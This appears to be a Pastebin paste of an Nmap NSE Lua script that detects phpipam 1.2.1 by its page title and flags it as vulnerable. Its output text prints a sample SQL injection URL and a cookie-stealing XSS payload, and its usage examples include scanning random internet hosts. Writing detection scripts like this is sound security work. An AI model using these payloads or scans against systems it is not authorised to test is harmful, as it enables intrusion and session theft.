Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ---
- -- Nmap NSE phpipam.nse - Version 1.5
- -- Copy script to: /usr/share/nmap/scripts/phpipam.nse
- -- Update NSE database: sudo nmap --script-updatedb
- -- executing: nmap --script-help phpipam.nse
- -- executing: nmap -sV -Pn -p 80 --open --script phpipam.nse <target>
- -- executing: nmap -sS -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam.php <target>
- ---
- -- SCRIPT BANNER DESCRIPTION --
- description = [[
- Module Author: r00t-3xp10it
- Vuln discover: Saeed reza
- NSE script to detect multiple vulnerabilitys in phpipam (1.2.1) open-source web IP address management application (IPAM).
- we can use script arguments to scan for a diferent url ( --script-args uri=<vulnerable url to scan> <target> ).
- Some Syntax examples:
- nmap --script-help phpipam.nse
- nmap -sV -Pn -p 80 --script phpipam.nse <target>
- nmap -sV -Pn -p 80 --open --script phpipam.nse <target>
- nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24
- nmap -sS -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam.php <target>
- nmap -sS -T4 -iR 300 -Pn -p 80 --open --reason --script phpipam.nse -oN /root/phpipam-vuln-report.log
- ]]
- ---
- -- @usage
- -- nmap --script-help phpipam.nse
- -- nmap -sV -Pn -p 80 --script phpipam.nse <target>
- -- nmap -sV -Pn -p 80 --open --script phpipam.nse <target>
- -- nmap -sS -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam.php <target>
- -- nmap -sS -T4 -iR 300 -Pn -p 80 --open --reason --script phpipam.nse -oN /root/phpipam-vuln-report.log
- -- @output
- -- PORT STATE SERVICE VERSION
- -- 80/tcp open http phpipam 1.2.1
- -- | phpipam: 1.2.1 multiple vulnerabilities
- -- | State: VULNERABLE
- -- | Returned: 200 (likelly exploitable)
- -- | Disclosure date: 21 set 2016
- -- | Vuln discover: Saeed reza
- -- | Module Author: r00t-3xp10it
- -- |
- -- | Description:
- -- | phpipam is an open-source web IP address management application, its goal is to provide light
- -- | modern and useful IP address management. It is php-based application with MySQL database backend,
- -- | using jQuery libraries, ajax and some HTML5/CSS3 features.
- -- | [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50'
- -- | [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
- -- |
- -- | References:
- -- | Vendor: http://phpipam.net/
- -- | Vuln Discover: http://0day.today/exploit/25375
- -- | Module Author: https://sourceforge.net/u/peterubuntu10/profile/
- -- |_
- -- @args payload.uri the path name to search. Default: /phpipam.html
- ---
- author = "r00t-3xp10it"
- license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
- categories = {"safe", "discovery", "vuln"}
- -- DEPENDENCIES (lua nse libraries) --
- local stdnse = require ('stdnse') --> required to use nse arguments
- local shortport = require "shortport"
- local string = require "string"
- local http = require "http"
- -- THE RULE SECTION --
- -- portrule = shortport.http --> updated to scan only the selected ports/proto/services
- portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open")
- -- local uri = "/phpipam.html" --> updated to use script @args payload.uri
- local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/phpipam.html"
- -- THE ACTION SECTION --
- action = function(host, port)
- local response = http.get(host, port, uri)
- -- check if target its phpipam based website
- if ( response.status == 200 ) then
- local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>phpipam ([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")
- -- check the phpipam version installed
- if ( title == "1.2.1" ) then
- -- VULNERABLE nse module output display
- return "1.2.1 multiple vulnerabilities\n STATUS: VULNERABLE\n Returned: "..response.status.." (likelly exploitable)\n Disclosure date: 21 set 2016\n Vuln discover: Saeed reza\n Module Author: r00t-3xp10it\n\n Description:\n phpipam is an open-source web IP address management application, its goal is to provide light\n modern and useful IP address management. It is php-based application with MySQL database backend,\n using jQuery libraries, ajax and some HTML5/CSS3 features.\n [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50'\n [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit\n\n References:\n Vendor: http://phpipam.net/\n Vuln Discover: http://0day.today/exploit/25375\n Module Author: https://sourceforge.net/u/peterubuntu10/profile/\n\n"
- else
- -- NOT VULNERABLE version install found (1.2.1) of phpipam in target system
- return "\n STATUS: NOT VULNERABLE\n "..uri..": 200 Found\n version: "..title.."\n Module Author: r00t-3xp10it\n\n"
- end
- -- check for diferent google return codes
- -- to display a NON VULNERABLE output...
- elseif ( response.status == 404 ) then
- return "\n STATUS: NOT VULNERABLE\n Returned: "..response.status.." NOT FOUND\n Module Author: r00t-3xp10it\n\n"
- elseif ( response.status == 400 ) then
- return "\n STATUS: NOT VULNERABLE\n Returned: "..response.status.." BAD REQUEST\n Module Author: r00t-3xp10it\n\n"
- elseif ( response.status == 401 ) then
- return "\n STATUS: NOT VULNERABLE\n Returned: "..response.status.." UNAUTHORIZED\n Module Author: r00t-3xp10it\n\n"
- elseif ( response.status == 302 ) then
- return "\n STATUS: NOT VULNERABLE\n Returned: "..response.status.." REDIRECTED\n Module Author: r00t-3xp10it\n\n"
- else
- -- I dont want to write more response.status ... so i let my module displays the returned code :D
- return "\n STATUS: NOT VULNERABLE\n Returned: "..response.status.." response code\n Module Author: r00t-3xp10it\n\n"
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement